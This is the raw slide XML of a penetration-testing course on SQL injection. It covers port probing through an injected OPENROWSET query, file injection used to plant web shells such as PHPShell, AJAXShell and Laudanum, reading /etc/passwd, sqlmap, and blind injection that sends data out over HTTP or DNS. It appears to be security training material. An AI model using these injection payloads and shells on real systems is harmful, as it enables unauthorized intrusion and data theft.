              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can inject the following command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code to inject:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Select * from OPENROWSET ('SQLoledb', 'uid=sa; pwd=; Network=DBNETLIB; Address=10.5.42.1,80; timeout=5', 'select * from table')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We do not need to have real credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To determine the state of the port, look at the error message:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Closed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>"SQL Server does not exist or access denied"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Open:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>"OLE DB provider 'sqloledb' reported an error."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60419"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57400"/>
            <a:ext cx="8458200" cy="44196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60422"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Last step of the methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reporting is part of each step</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using the previous steps we try to expand our foothold</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Care needs to be taken to not cause larger issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>DoS attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Opening holes for other attackers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4800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>File Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669560" y="1710130"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>File injection using SQL injection becomes a pivot point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that SQL queries can contain user controlled data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>select "Kevin”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Returns a record set containing the string Kevin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can use this in combination with writing to files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4800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>File Injection Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Two options for what we would write:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Inject a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Call it from OS interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web Pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Build php/asp/cfm script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Call it from the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>May need to hook a client via XSS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63491"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89706" y="2133600"/>
            <a:ext cx="8458200" cy="44196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63494"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4800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Prepared Injection Files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many files are available for use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most were not created for SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But they can be used that way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Shell access is a primary goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Two prepackaged shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>phpshell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Ajaxshell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Laudanum is a collection of these types of files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4800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>PHPShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1981200"/>
            <a:ext cx="4572000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>PHPShell is a web based shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://phpshell.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sourceforge.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Made up of two files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>phpshell.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Contains the main shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>config.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Usernames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Command Aliases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65540" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-10000" contrast="10000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="2514600"/>
            <a:ext cx="4398963"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4800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>AJAXShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="4419600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A easier to use shell by IronFist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Single File to inject</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The interface includes buttons for commonly used commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Verify the ability to run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Gathering server info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Read /etc/passwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C17E4168-D3D8-4246-8E17-C6A483F03BB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4586287" y="1818103"/>
            <a:ext cx="4496913" cy="2907487"/>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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Laudanum</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700087" y="1339819"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Laudanum is a collection of these files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Released by Kevin Johnson of Secure Ideas </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and Justin Searle of UtiliSec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://laudanum.secureideas.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Contains multiple functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>DNS lookups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Proxying requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scope limiting features are in place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authorization based on usernames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Only allow certain IPs to access the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Returns a 404 otherwise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51203"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67390" y="2057400"/>
            <a:ext cx="8458200" cy="44196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sqlmap Exercise</a:t>
            </a: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51206"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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99990633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279750"/>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72710"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1755100"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most attacks are the same as with SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Errors are just not displayed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Data return becomes more complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use other protocols for data egress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
